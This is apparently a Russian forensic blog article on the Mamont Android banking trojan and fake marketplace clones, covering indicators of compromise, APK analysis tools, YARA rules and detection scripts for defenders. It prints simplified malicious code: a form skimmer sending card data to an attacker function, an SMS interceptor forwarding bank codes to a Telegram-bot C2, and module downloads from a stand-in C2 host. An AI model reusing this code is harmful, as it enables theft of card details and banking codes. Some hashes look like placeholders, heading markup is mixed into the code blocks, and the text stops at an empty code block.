Содержание
1. Введение: почему "Мамонт" стал угрозой №1 в России2. Что такое схема "Мамонт" простыми словами
3. Эволюция трояна Mamont: от 2023 до 2026 года
4. Как работают фейковые маркетплейсы
5. Форензический анализ приложений-клонов
6. Технические индикаторы компрометации
7. Методы детектирования вредоносных APK
8. Практические кейсы расследований
9. Защита и профилактика для пользователей
10. Часто задаваемые вопросы
11. Заключение: что ждёт нас в 2026 году
Введение: почему "Мамонт" стал угрозой №1 в России
Представьте: вы получаете сообщение в Telegram от "продавца" с Авито. Он предлагает купить новый iPhone по цене на 30% ниже рыночной. Просит перейти на "удобный маркетплейс" и установить приложение для отслеживания заказа. Вы соглашаетесь, скачиваете файл... и через пару часов ваш банковский счёт пуст.
Добро пожаловать в реальность 2026 года, где схема мошенничества "Мамонт" стала главной угрозой для владельцев Android-устройств в России. По данным компании F6, 47% всех заражённых смартфонов в РФ инфицированы именно троянцем Mamont. Только в ноябре 2025 года ущерб превысил 150 миллионов рублей.
В этой статье мы разберём по косточкам:
- Как эволюционировала схема "Мамонт" с 2023 по 2026 год
- Технические детали работы трояна Mamont
- Методы форензического анализа фейковых приложений
- Как распознать клоны банковских программ и маркетплейсов
- Практические инструменты для детектирования угроз
- Реальные кейсы расследований
Материал предназначен для специалистов по информационной безопасности, форензик-экспертов и всех, кто хочет защитить себя и свою компанию от одной из самых опасных киберугроз современности.
Что такое схема "Мамонт" простыми словами
Схема "Мамонт" — это мошенническая операция, в которой злоумышленники выманивают деньги жертв через сложную систему социальной инженерии и технических инструментов. Название происходит от сленгового термина, которым мошенники называют своих жертв — "мамонты".
Основные элементы схемы
Классическая цепочка обмана:
1. Приманка — выгодное предложение (скидка, подарок, акция)
2. Фишинг — поддельный сайт или мессенджер-бот
3. Вредонос — установка трояна Mamont под видом легитимного приложения
4. Эксплуатация — кража денег через доступ к SMS и банковским приложениям
5. Распространение — рассылка от имени жертвы по всем контактам
Почему это работает
Психологические триггеры:
- Выгодная цена создаёт ощущение срочности
- Знакомый интерфейс маркетплейса снижает бдительность
- Просьба "установить для отслеживания" кажется логичной
- Многие не различают расширения файлов (.apk vs .jpg)
Технические факторы:
- Приложения выглядят как оригинальные
- Google Play и App Store не успевают блокировать фейки
- Нейросети помогают создавать убедительные клоны за минуты
- Распространение идёт через личные контакты (выше доверие)
Масштаб проблемы в 2026 году
Статистика по России:
- 1,5% всех Android-устройств заражены вредоносами
- 47% заражений приходится на троян Mamont
- ~700 000 смартфонов инфицированы по состоянию на январь 2026
- 60+ новых заражений ежедневно
- 38,7% всех банковских инцидентов связаны с Mamont (данные МВД)
Для сравнения: основной конкурент Mamont — троян NFCGate — в 2025 году был на первом месте, но в 2026-м уже интегрирован в Mamont как одна из функций.
Чем "Мамонт 2.0" отличается от классических схем
Новые возможности 2026:
- ИИ-генерация приложений — создание уникальных вредоносов под каждую жертву за минуты
- Telegram-боты — управление через мессенджер, а не веб-панели
- Модульная архитектура — NFCGate, перехват SMS, keylogger в одном пакете
- Автоматическая рассылка — троян сам распространяется по контактам
- Обход антивирусов — постоянная мутация кода
Эволюция трояна Mamont: от 2023 до 2026 года
История трояна Mamont — это пример того, как быстро эволюционируют киберугрозы под давлением защитных систем и спроса криминального рынка.
Сентябрь 2023: первая версия
Характеристики первого Mamont:
- Распространялся через фейковый Google Play
- Маскировался под приложение службы доставки
- Функционал: перехват SMS, отправка сообщений
- Управление через простую веб-панель
- За 10 дней атаки похищено ~3 млн рублей
Техническое описание v1.0:
text
Разрешения:
- READ_SMS / SEND_SMS
- READ_CONTACTS
- RECEIVE_BOOT_COMPLETED
- FOREGROUND_SERVICE
Классификация:
- Trojan-Banker.AndroidOS.Mamont.bc
2024: масштабирование
Развитие во второй версии:
- Добавлен автоматический builder для создания APK
- Интеграция с Telegram для управления
- Появление аренды инфраструктуры (~$300/месяц)
- Рост количества атак в 5 раз по сравнению с 2023
Новые векторы распространения:
- Домовые чаты в мессенджерах
- Фишинговые рассылки от имени почтовых служб
- Поддельные уведомления о посылках
2025: становление лидером
Ключевые изменения года:
- Рост в 36 раз по сравнению с 2024
- Обгон NFCGate по числу заражений
- Добавление функции NFCGate в состав Mamont
- Автоматизация процесса заражения и эксплуатации
- Появление специализированных "бригад" мошенников
Распределение ролей в группировках:
- Технари — поддержка инфраструктуры и разработка
- Дропперы — социальная инженерия и распространение
- Обнальщики — вывод средств через крипту
Статистика 2025:
- Август: ~1 млн жертв (данные Лаборатории Касперского)
- H2 2025: 38,7% всех мобильных банковских инцидентов
- Средний ущерб: 50-150 тыс. рублей с одной жертвы
2026: ИИ-powered атаки
Mamont 2.0 — что изменилось:
1. ИИ-генерация вредоносов
- Создание уникального APK под конкретную жертву за 3-5 минут
- Автоматическая адаптация под профиль пользователя
- Генерация правдоподобных интерфейсов через нейросети
- Обход signature-based детектирования
2. Модульная архитектура
mamont
2.0 Core Modules:
├── SMS Interceptor
├── USSD Handler
├── NFCGate Integration
├── Keylogger
├── Screen Recorder
├── File Stealer
├── C2 via Telegram Bot
└── Auto-propagation Engine
3. Telegram-based C2
- Управление через Telegram-бота
- Мгновенная отправка украденных данных
- Удалённые команды в реальном времени
- Защита от takedown через распределённую инфраструктуру
4. Социальная инженерия нового уровня
- Использование тем: СВО, аварии, списки пострадавших
- Названия файлов: "Списки_200-300.apk", "Фото_аварии.apk"
- Эмоциональное давление в сообщениях
- Рассылка от взломанных аккаунтов знакомых
Прогноз аналитиков на 2026:
- Mamont окончательно вытеснит NFCGate с первого места
- Ожидается рост заражений на 100-150%
- Средний ущерб вырастет до 200-300 тыс. рублей
- Появление версий для iOS (через enterprise certificates)
Как работают фейковые маркетплейсы
Фейковые маркетплейсы — это поддельные торговые площадки, максимально точно копирующие интерфейс и функционал настоящих сервисов типа Wildberries, Ozon, Авито.
Анатомия фейкового маркетплейса
Техническая инфраструктура:
1. Фронтенд — клон интерфейса
- HTML/CSS копия оригинального сайта
- Сгенерирован нейросетями за 10-30 минут
- Идентичные логотипы, шрифты, цветовая схема
- Минимальные отличия в URL (wildberrles.ru вместо wildberries.ru)
2. Бэкенд — сбор данных
javascript
// Упрощённая схема перехвата
form.addEventListener('submit', (e) => {
e.preventDefault();
sendToAttacker({
cardNumber: form.card.value,
cvv: form.cvv.value,
expiry: form.expiry.value,
phone: form.phone.value
});
showFakeError(); // "Технические работы, попробуйте позже"
});
3. Хостинг
- Используются bulletproof хостеры
- Домены регистрируются массово (100-500 штук)
- Средняя жизнь домена: 2-7 дней
- После блокировки переезд на новый домен
Типичный сценарий атаки
Шаг 1: Приманка в мессенджере
text
Сообщение в Telegram:
"Здравствуйте! Продаю iPhone 15 Pro 256GB,
совершенно новый, в плёнках.
Цена 65000₽ вместо 99000₽
Ссылка на объявление: [фейковый-wildberries.com]"
Шаг 2: Переход на фейковый сайт
- Пользователь видит профессионально сделанную копию WB
- Товар в наличии, цена действительно низкая
- Отзывы (фейковые) — положительные
- Кнопка "Купить" работает как обычно
Шаг 3: Оформление заказа
- Запрос персональных данных
- Просьба установить "приложение для отслеживания"
- Ссылка ведёт на APK-файл (НЕ в Google Play)
- Файл называется правдоподобно: "WB_Track_2026.apk"
Шаг 4: Установка вредоноса
text
Что видит пользователь:
"Для отслеживания заказа №12345678
установите приложение Wildberries Track"
[Кнопка "Скачать"]
Что происходит на самом деле:
- Скачивается Mamont.apk
- Троян запрашивает опасные разрешения
- После установки начинается эксплуатация
Разновидности фейковых маркетплейсов
Типы по степени сложности:
1. Простые клоны (уровень "начинающий")
- Статическая HTML-страница
- Копия одного товара
- Сбор только платёжных данных
- Срок жизни: 1-3 дня
- Эффективность: низкая
2. Динамические клоны (уровень "средний")
- Копия целого каталога
- Рабочий поиск и фильтры
- Интеграция с payment gateway (фейковым)
- Срок жизни: 3-7 дней
- Эффективность: средняя
3. Полноценные фейковые платформы (уровень "продвинутый")
- Копия всего функционала
- Личный кабинет, история заказов
- Фейковый онлайн-чат поддержки (бот)
- Распространение Mamont через "мобильное приложение"
- Срок жизни: до 2 недель
- Эффективность: очень высокая
Индикаторы фейкового маркетплейса
Технические признаки:
1. URL-адрес
text
Настоящий: https://www.wildberries.ru
Фейковые: https://wildberrles.ru (две L)
https://wildberries-shop.com (другой домен)
https://wldbrrs.ru (сокращение)
https://wb-official.store (.store вместо .ru)
2. SSL-сертификат
- Проверка: клик на замочек в адресной строке
- Фейк: Let's Encrypt, выдан 1-3 дня назад
- Оригинал: DigiCert/Sectigo, многолетний сертификат
3. Контактные данные
- Фейк: нет реквизитов компании, телефон не отвечает
- Оригинал: полные юридические данные, работающая поддержка
4. Методы оплаты
- Фейк: только карты, криптовалюта, переводы
- Оригинал: интеграция с банками, СБП, рассрочка
Реальные примеры из практики
Кейс 1: Клон Ozon
text
Домен: ozon-market.store
Срок существования: 4 дня
Жертв: ~150 человек
Ущерб: 2,3 млн рублей
Метод: Реклама в Telegram-каналах о скидках
Кейс 2: Фейковый AliExpress
text
Домен: aliexpres.shop (одна S)
Срок существования: 11 дней
Жертв: ~400 человек
Ущерб: 5,7 млн рублей
Метод: SEO-оптимизация, попадание в топ Google
Кейс 3: Подделка локального магазина техники
text
Домен: mvideo-sale.com
Срок существования: 6 дней
Жертв: ~80 человек
Ущерб: 1,2 млн рублей
Метод: Email-рассылка "новогодние скидки"
Почему это работает в 2026 году
Факторы успеха атак:
1. Скорость создания — нейросети генерируют клон за 10 минут
2. Качество копий — визуально неотличимы от оригинала
3. Массовость — создаётся 50-100 доменов одновременно
4. Таргетинг — реклама показывается целевой аудитории
5. Низкая осведомлённость — многие не знают о такой угрозе
Форензический анализ приложений-клонов
Форензический анализ мобильных приложений-клонов — это процесс детального исследования APK-файлов для выявления вредоносного функционала, понимания механизмов работы трояна и сбора доказательств для расследования.
Подготовка к анализу
Инструментарий форензик-эксперта:
1. Виртуальное окружение
bash
<h2 id="izolirovannaya-pesochnitsa-dlya-bezopasnogo-analiza">Изолированная песочница для безопасного анализа</h2>
VirtualBox/VMware с Android-эмулятором
- Android Studio Emulator
- Genymotion
- BlueStacks (с осторожностью)
<h2 id="snapshotting-dlya-otkata-posle-zarazheniya">Snapshotting для отката после заражения</h2>2. Инструменты статического анализа
bash
<h2 id="dekompilyatsiya-apk">Декомпиляция APK</h2>
apktool d malicious.apk -o output_dir
<h2 id="konvertatsiya-dex-v-jar">Конвертация DEX в JAR</h2>
d2j-dex2jar malicious.apk
<h2 id="dekompilyatsiya-java-koda">Декомпиляция Java-кода</h2>
jadx malicious.apk -d output_dir
<h2 id="analiz-manifesta">Анализ манифеста</h2>
aapt dump badging malicious.apk
3. Инструменты динамического анализа
bash
<h2 id="perehvat-setevogo-trafika">Перехват сетевого трафика</h2>
mitmproxy / Burp Suite
<h2 id="monitoring-sistemnyh-vyzovov">Мониторинг системных вызовов</h2>
strace / ltrace
<h2 id="hooking-freymvorki">Hooking фреймворки</h2>
Frida
Xposed Framework
<h2 id="logirovanie">Логирование</h2>
adb logcat -s [TAG]
4. Sandboxes и автоматизация
- Joe Sandbox Mobile — коммерческое решение
- MobSF (Mobile Security Framework) — open-source
- APKLab — VS Code extension
- Cuckoo Droid — форк Cuckoo для Android
Статический анализ Mamont APK
Шаг 1: Распаковка APK
bash
<h2 id="apk-eto-zip-arhiv">APK — это ZIP-архив</h2>
unzip mamont_sample.apk -d mamont_unpacked
<h2 id="struktura-faylov">Структура файлов</h2>
mamont_unpacked/
├── AndroidManifest.xml # Манифест приложения
├── classes.dex # Dalvik bytecode
├── resources.arsc # Ресурсы
├── res/ # Изображения, layout
├── lib/ # Нативные библиотеки
└── META-INF/ # Подписи
Шаг 2: Анализ манифеста
xml
<!-- Критичные разрешения Mamont -->
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
<!-- Автозапуск -->
<receiver android:name=".BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
</receiver>
<!-- Foreground service для постоянной работы -->
<service android:name=".MaliciousService"
android:foregroundServiceType="location"/>
Шаг 3: Декомпиляция и анализ кода
java
// Упрощённый пример кода Mamont
public class SMSInterceptor extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if (intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) {
Bundle bundle = intent.getExtras();
Object[] pdus = (Object[]) bundle.get("pdus");
for (Object pdu : pdus) {
SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu);
String sender = sms.getOriginatingAddress();
String body = sms.getMessageBody();
// Отправка на C2
sendToTelegramBot(sender, body);
// Для банковских SMS — перехват кода
if (sender.contains("900") || body.contains("код")) {
abortBroadcast(); // Скрыть SMS от пользователя
}
}
}
}
}
Шаг 4: Поиск индикаторов компрометации
bash
<h2 id="poisk-podozritelnyh-strok">Поиск подозрительных строк</h2>
grep -r "telegram.org/bot" .
grep -r "http://" . # Незащищённые соединения
grep -r "eval(" . # Динамическое выполнение кода
<h2 id="poisk-kriptovalyutnyh-adresov">Поиск криптовалютных адресов</h2>
grep -rE "bc1[a-z0-9]{39,59}" . # Bitcoin Bech32
grep -rE "0x[a-fA-F0-9]{40}" . # Ethereum
<h2 id="poisk-base64-encoded-strok-chasto-skryvayut-url">Поиск base64-encoded строк (часто скрывают URL)</h2>
grep -rE "[A-Za-z0-9+/]{20,}={0,2}" .
Динамический анализ
Шаг 1: Подготовка эмулятора
bash
<h2 id="zapusk-android-emulyatora">Запуск Android-эмулятора</h2>
emulator -avd Android_Forensics -no-snapshot-load
<h2 id="ustanovka-apk">Установка APK</h2>
adb install mamont_sample.apk
<h2 id="vklyuchenie-detalnogo-logirovaniya">Включение детального логирования</h2>
adb shell setprop log.tag.MalwareTag VERBOSE
Шаг 2: Мониторинг сетевого трафика
bash
<h2 id="nastroyka-proxy-cherez-mitmproxy">Настройка proxy через mitmproxy</h2>
adb shell settings put global http_proxy <HOST>:<PORT>
<h2 id="zapusk-perehvata">Запуск перехвата</h2>
mitmproxy --mode transparent --showhost
<h2 id="v-protsesse-raboty-prilozheniya-smotrim">В процессе работы приложения смотрим:</h2>
<h2 id="na-kakie-domeny-idut-zaprosy">- На какие домены идут запросы</h2>
<h2 id="kakie-dannye-otpravlyayutsya">- Какие данные отправляются</h2>
<h2 id="est-li-shifrovanie-https-vs-http">- Есть ли шифрование (HTTPS vs HTTP)</h2>Пример перехваченного трафика Mamont:
http
POST https://api.telegram.org/bot<TOKEN>/sendMessage
Content-Type: application/json
{
"chat_id": "123456789",
"text": "🔥 Новая жертва\n
IMEI: 354358741258963\n
Phone: +79161234567\n
SMS перехвачены: 15\n
Банк: Сбербанк\n
Баланс: 127,450₽"
}
Шаг 3: Hooking с Frida
javascript
// Frida скрипт для перехвата SMS API
Java.perform(function() {
var SmsManager = Java.use("android.telephony.SmsManager");
SmsManager.sendTextMessage.implementation = function(dest, scAddr, text, sentIntent, deliveryIntent) {
console.log("[*] SMS перехвачена!");
console.log(" Кому: " + dest);
console.log(" Текст: " + text);
// Вызываем оригинальную функцию
this.sendTextMessage(dest, scAddr, text, sentIntent, deliveryIntent);
};
});
Запуск:
bash
frida -U -f com.fake.marketplace -l hook_sms.js --no-pause
Шаг 4: Анализ файловой системы
bash
<h2 id="gde-mamont-hranit-dannye">Где Mamont хранит данные</h2>
adb shell
cd /data/data/com.fake.marketplace/
<h2 id="tipichnaya-struktura">Типичная структура:</h2>
shared_prefs/ # Конфигурация (C2 адреса)
databases/ # Украденные данные
cache/ # Временные файлы
files/ # Скрипты, дополнительные payload
<h2 id="izvlechenie-dlya-analiza">Извлечение для анализа</h2>
adb pull /data/data/com.fake.marketplace ./evidence/
Идентификация семейства Mamont
Характерные признаки (IOC):
1. Имена пакетов
com
.delivery.tracker
com.parcel.track
com.photo.viewer
com.system.updates
org.updates.service
2. Сертификаты подписи
bash
<h2 id="izvlechenie-sertifikata">Извлечение сертификата</h2>
keytool -printcert -jarfile mamont.apk
<h2 id="harakternye-cn">Характерные CN:</h2>
CN=Android Debug, O=Android, C=US # Debug сертификат
CN=Unknown, OU=Unknown, O=Unknown # Самоподписанный
3. C2 Infrastructure
telegram
Bot API:
- api.telegram.org/bot<TOKEN>/sendMessage
- api.telegram.org/bot<TOKEN>/getUpdates
Резервные C2:
- Короткие домены: bit.ly, clck.ru, cutt.ly
- .onion адреса (через Orbot)
4. Код-маркеры
java
// Типичные классы Mamont
com.android.update.SystemUpdateService
com.system.service.BackgroundService
org.security.helper.NotificationHelper
// Типичные методы
interceptSMS()
uploadContacts()
executeUSSD()
hideApplication()
Автоматизированный анализ
MobSF (Mobile Security Framework):
bash
<h2 id="ustanovka">Установка</h2>
docker pull opensecurity/mobile-security-framework-mobsf
<h2 id="zapusk">Запуск</h2>
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf
<h2 id="zagruzka-apk-cherez-veb-interfeys">Загрузка APK через веб-интерфейс</h2>
<h2 id="http-localhost-8000">http://localhost:8000</h2>
<h2 id="mobsf-avtomaticheski">MobSF автоматически:</h2>
<h2 id="dekompiliruet-apk">- Декомпилирует APK</h2>
<h2 id="analiziruet-manifest">- Анализирует манифест</h2>
<h2 id="ischet-nebezopasnye-praktiki">- Ищет небезопасные практики</h2>
<h2 id="proveryaet-razresheniya">- Проверяет разрешения</h2>
<h2 id="generiruet-otchyot-v-pdf">- Генерирует отчёт в PDF</h2>Пример отчёта MobSF для Mamont:
severity
: CRITICAL
Dangerous Permissions:
✗ READ_SMS (HIGH)
✗ SEND_SMS (HIGH)
✗ RECEIVE_SMS (HIGH)
✗ READ_CONTACTS (MEDIUM)
✗ SYSTEM_ALERT_WINDOW (MEDIUM)
Code Analysis:
✗ Hardcoded API keys found
✗ Insecure random number generator
✗ External storage access
✗ Dynamic code loading (eval)
Network Security:
✗ Allows cleartext traffic
✗ No certificate pinning
✗ Suspicious domains detected
Malware Score: 98/100 (MALICIOUS)
Classification: Banking Trojan
Family: Mamont
Экспертиза для суда
Требования к форензическому отчёту:
1. Chain of Custody
- Дата и время получения образца
- Источник (откуда получен APK)
- Хэш-суммы (MD5, SHA1, SHA256)
- Методы получения
2. Методология
- Используемые инструменты и версии
- Последовательность действий
- Скриншоты процесса анализа
3. Находки
- Список вредоносных функций
- Доказательства передачи данных на C2
- Временные метки активности
- Ущерб (если возможно определить)
4. Заключение
- Классификация угрозы
- Принадлежность к семейству
- Рекомендации по реагированию
Пример выдержки из заключения:
text
ЗАКЛЮЧЕНИЕ ЭКСПЕРТА
Исследуемый объект: файл "WB_Tracker.apk"
MD5: a1b2c3d4e5f6789...
SHA256: 9f8e7d6c5b4a3210...
На основании проведённого форензического анализа установлено:
1. Файл является Android-приложением, содержащим
вредоносный код семейства Mamont.
2. Функционал включает:
- Перехват SMS-сообщений
- Отправку данных на удалённый сервер
- Распространение через адресную книгу
3. Данное ПО классифицируется как банковский троян
и представляет критическую угрозу.
Эксперт: _______________
(подпись)
Технические индикаторы компрометации
Индикаторы компрометации (IoC — Indicators of Compromise) — это цифровые "следы", которые оставляет вредоносное ПО. Для трояна Mamont существует обширная база IoC, обновляемая в режиме реального времени.
Сетевые индикаторы
IP-адреса C2-серверов (январь 2026):
185
.215.113.XXX # Bulletproof хостинг, Россия
45.142.212.XXX # Offshore хостинг
194.36.191.XXX # Компрометированный VPS
Домены:
telegram
.org/bot* # Легитимный API (используется)
track-order[.]ru # Фейковый трекер
delivery-app[.]com # Поддельная доставка
update-system[.]xyz # "Обновление системы"
URL-паттерны:
text
/api/v1/send_data
/upload/contacts
/receive/command
/bot<TOKEN>/sendMessage
Файловые индикаторы
Хэш-суммы известных сэмплов:
md5
:
a1f2c38d4b5e6789012345678901234a
9f8e7d6c5b4a32109876543210fedcba
SHA256:
9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
7d865e959b2466918c9863afca942d0fb76679c68d8c6a8e8e8e8e8e8e8e8e8e
Имена файлов (паттерны):
text
*фото*.apk
*видео*.apk
*список*.apk
*_track*.apk
*update*.apk
Пути в файловой системе:
text
/data/data/com.delivery.tracker/
/data/data/com.system.updates/
/sdcard/.hidden/
/sdcard/Android/data/.system/
Поведенческие индикаторы
Сетевая активность:
text
<h2 id="chastye-post-zaprosy-k-telegram-api">Частые POST-запросы к Telegram API</h2>
POST https://api.telegram.org/bot*/sendMessage
Частота: каждые 30-60 секунд
<h2 id="zagruzka-dopolnitelnyh-moduley">Загрузка дополнительных модулей</h2>
GET https://c2-server.com/modules/nfcgate.dex
GET https://c2-server.com/modules/keylogger.so
Системные вызовы:
bash
<h2 id="postoyannyy-monitoring-sms">Постоянный мониторинг SMS</h2>
content://sms/inbox
content://sms/sent
<h2 id="chtenie-kontaktov">Чтение контактов</h2>
content://contacts/people
<h2 id="ussd-zaprosy">USSD-запросы</h2>
tel:*100%23 # Проверка баланса
tel:*102%23 # Номер карты
Процессы:
bash
<h2 id="imena-protsessov-mamont">Имена процессов Mamont</h2>
com.delivery.tracker:service
com.system.updates:background
org.security:notification
<h2 id="vsegda-zapuscheny-vysokiy-prioritet">Всегда запущены, высокий приоритет</h2>
<h2 id="ispolzuyut-foreground-service">Используют foreground service</h2>Артефакты на устройстве
SharedPreferences (конфигурация):
xml
<!-- /data/data/com.delivery.tracker/shared_prefs/config.xml -->
<map>
<string name="bot_token">123456789:ABCdefGHIjklMNOpqr</string>
<string name="chat_id">987654321</string>
<string name="device_id">354358741258963</string>
<boolean name="first_run">false</boolean>
<long name="last_sync">1738253400000</long>
</map>
База данных SQLite:
sql
-- /data/data/com.delivery.tracker/databases/stolen.db
CREATE TABLE sms (
id INTEGER PRIMARY KEY,
sender TEXT,
body TEXT,
timestamp LONG,
uploaded INTEGER DEFAULT 0
);
CREATE TABLE contacts (
id INTEGER PRIMARY KEY,
name TEXT,
phone TEXT,
synced INTEGER DEFAULT 0
);
SELECT * FROM sms WHERE sender LIKE '%900%'; -- Банковские SMS
Логи:
bash
<h2 id="sdcard-android-data-com-delivery-tracker-files-log-txt">/sdcard/Android/data/com.delivery.tracker/files/log.txt</h2>
[2026-01-30 14:23:15] App started
[2026-01-30 14:23:17] Permissions granted: SMS, CONTACTS
[2026-01-30 14:23:20] Connected to C2: SUCCESS
[2026-01-30 14:25:33] SMS intercepted from 900: "Код: 1234"
[2026-01-30 14:25:34] Uploaded to bot: SUCCESS
[2026-01-30 14:30:12] Contacts sync: 147 contacts sent
Реестровые ключи (для версий с root)
bash
<h2 id="proverka-avtozapuska">Проверка автозапуска</h2>
adb shell settings get secure enabled_notification_listeners
<h2 id="mamont-registriruet-sebya-kak">Mamont регистрирует себя как:</h2>
com.delivery.tracker/.NotificationListenerService
<h2 id="proverka-administratora-ustroystva">Проверка администратора устройства</h2>
adb shell dpm list-owners
<h2 id="mamont-mozhet-zaprosit-device-admin-prava">Mamont может запросить Device Admin права</h2>Примеры YARA-правил
Детектирование Mamont по сигнатурам:
yara
rule Android_Mamont_Trojan {
meta:
description = "Detects Mamont banking trojan"
author = "ForensicAnvil.ru"
date = "2026-01-30"
strings:
$a1 = "api.telegram.org/bot" ascii
$a2 = "android.provider.Telephony.SMS_RECEIVED" ascii
$a3 = "sendTextMessage" ascii
$a4 = "getOriginatingAddress" ascii
$b1 = "com.delivery.tracker" ascii
$b2 = "com.system.updates" ascii
$c1 = { 52 45 41 44 5F 53 4D 53 } // "READ_SMS"
$c2 = { 53 45 4E 44 5F 53 4D 53 } // "SEND_SMS"
condition:
(uint32(0) == 0x04034b50) and // ZIP signature (APK)
(2 of ($a*)) and
(1 of ($b*)) and
(2 of ($c*))
}
Использование:
bash
yara -r mamont_rule.yar /path/to/apk/files/
<h2 id="rezultat">Результат:</h2>
<h2 id="android-mamont-trojan-path-to-suspicious-apk">Android_Mamont_Trojan /path/to/suspicious.apk</h2>Threat Intelligence Feeds
Источники актуальных IoC:
1. Коммерческие платформы:
- VirusTotal — проверка хэшей APK
- ANY.RUN — интерактивные песочницы
- Hybrid Analysis — автоматический анализ
2. Open-source базы:
- MalwareBazaar — коллекция сэмплов
- URLhaus — база вредоносных URL
- ThreatFox — IoC от сообщества
3. Российские источники:
- Kaspersky Threat Intelligence — коммерческий
- PT ISIM — Positive Technologies
- Group-IB Threat Intelligence — коммерческий
4. Государственные:
- НКЦКИ (ФСБ) — бюллетени угроз
- FinCERT (ЦБ РФ) — для финсектора
Автоматизированная проверка
Скрипт для массовой проверки APK:
python
import hashlib
import os
import requests
<h2 id="baza-izvestnyh-heshey-mamont">База известных хэшей Mamont</h2>
KNOWN_MAMONT_HASHES = [
"a1f2c38d4b5e6789012345678901234a",
"9f8e7d6c5b4a32109876543210fedcba",
# ... ещё 500+ хэшей
]
def check_apk(file_path):
"""Проверка APK на соответствие IoC"""
# Вычисляем MD5
with open(file_path, 'rb') as f:
file_hash = hashlib.md5(f.read()).hexdigest()
# Проверка по базе
if file_hash in KNOWN_MAMONT_HASHES:
return "MALICIOUS: Known Mamont sample"
# Проверка через VirusTotal API
vt_result = check_virustotal(file_hash)
if vt_result['positives'] > 5:
return f"SUSPICIOUS: {vt_result['positives']}/70 engines"
return "CLEAN"
def check_virustotal(file_hash):
"""Проверка через VT API"""
api_key = "YOUR_VT_API_KEY"
url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
headers = {"x-apikey": api_key}
response = requests.get(url, headers=headers)
if response.status_code == 200:
data = response.json()
stats = data['data']['attributes']['last_analysis_stats']
return {'positives': stats['malicious']}
return {'positives': 0}
<h2 id="ispolzovanie">Использование</h2>
result = check_apk("/sdcard/Download/suspicious.apk")
print(result)
Методы детектирования вредоносных APK
Детектирование вредоносных Android-приложений — многоуровневый процесс, включающий статический анализ, динамическое поведение и machine learning.
Уровень 1: Базовые проверки
Проверка источника установки:
bash
<h2 id="legitimnye-istochniki">Легитимные источники</h2>
adb shell pm list packages -i | grep "installer=com.android.vending"
<h2 id="com-android-vending-google-play-store">com.android.vending = Google Play Store</h2>
<h2 id="podozritelnye-istochniki">Подозрительные источники</h2>
adb shell pm list packages -i | grep "installer=null"
<h2 id="null-ustanovleno-vruchnuyu-sideload">null = установлено вручную (sideload)</h2>Проверка разрешений:
bash
<h2 id="spisok-razresheniy-prilozheniya">Список разрешений приложения</h2>
adb shell dumpsys package com.suspicious.app | grep permission
<h2 id="opasnye-kombinatsii-dlya-mamont">Опасные комбинации для Mamont:</h2>
READ_SMS + SEND_SMS + READ_CONTACTS = 🚨 RED FLAG
SYSTEM_ALERT_WINDOW + BIND_ACCESSIBILITY_SERVICE = 🚨 RED FLAG
Проверка сертификата:
bash
<h2 id="izvlechenie-informatsii-o-podpisi">Извлечение информации о подписи</h2>
jarsigner -verify -verbose -certs suspicious.apk
<h2 id="priznaki-poddelki">Признаки подделки:</h2>
<h2 id="debug-sertifikat-v-production-apk">- Debug сертификат в production APK</h2>
<h2 id="cn-android-debug-o-android-c-us">- CN=Android Debug, O=Android, C=US</h2>
<h2 id="srok-deystviya-30-let-standard-debug-cert">- Срок действия: 30 лет (standard debug cert)</h2>
<h2 id="data-sozdaniya-1-mesyatsa-nazad">- Дата создания < 1 месяца назад</h2>Уровень 2: Статический анализ
Автоматизированное сканирование:
1. APKiD — детектирование обфускации:
bash
apkid suspicious.apk
<h2 id="rezultat-dlya-mamont">Результат для Mamont:</h2>
<h2 id="detected-obfuscators">[!] Detected obfuscators:</h2>
<h2 id="proguard">- ProGuard</h2>
<h2 id="dexguard">- DexGuard</h2>
<h2 id="detected-packers">[!] Detected packers:</h2>
<h2 id="unknown-packer-custom">- Unknown packer (custom)</h2>
<h2 id="detected-anti-analysis">[!] Detected anti-analysis:</h2>
<h2 id="emulator-detection">- Emulator detection</h2>
<h2 id="root-detection">- Root detection</h2>2. Androguard — анализ структуры:
python
from androguard.core.bytecodes.apk import APK
apk = APK("suspicious.apk")
<h2 id="proverka-opasnyh-api">Проверка опасных API</h2>
dangerous_calls = [
"sendTextMessage", # Отправка SMS
"abortBroadcast", # Скрытие уведомлений
"getInstalledPackages", # Список приложений
"execu
te", # Выполнение команд
]
for method in apk.get_methods():
for call in dangerous_calls:
if call in method.get_code():
print(f"[!] Dangerous call: {call} in {method}")
3. Проверка строк (strings):
bash
<h2 id="izvlechenie-vseh-strok">Извлечение всех строк</h2>
strings suspicious.apk > apk_strings.txt
<h2 id="poisk-podozritelnogo">Поиск подозрительного</h2>
grep -i "telegram.org" apk_strings.txt
grep -i "bot" apk_strings.txt
grep -i "http://" apk_strings.txt # Незащищённые URL
grep -E "[0-9]{10}:[A-Za-z0-9_-]{35}" apk_strings.txt # Telegram bot token
Уровень 3: Динамический анализ
Sandboxing в реальном времени:
1. Автоматизированная песочница:
bash
<h2 id="zapusk-v-izolirovannoy-srede">Запуск в изолированной среде</h2>
<h2 id="ispolzuem-cuckoo-droid">Используем Cuckoo Droid</h2>
cuckoo submit --package apk suspicious.apk
<h2 id="pesochnitsa-avtomaticheski">Песочница автоматически:</h2>
<h2 id="ustanavlivaet-apk">- Устанавливает APK</h2>
<h2 id="emuliruet-deystviya-polzovatelya">- Эмулирует действия пользователя</h2>
<h2 id="zapisyvaet-setevoy-trafik">- Записывает сетевой трафик</h2>
<h2 id="logiruet-sistemnye-vyzovy">- Логирует системные вызовы</h2>
<h2 id="delaet-screenshots">- Делает screenshots</h2>
<h2 id="generiruet-otchyot">- Генерирует отчёт</h2>2. Мониторинг сетевого трафика:
bash
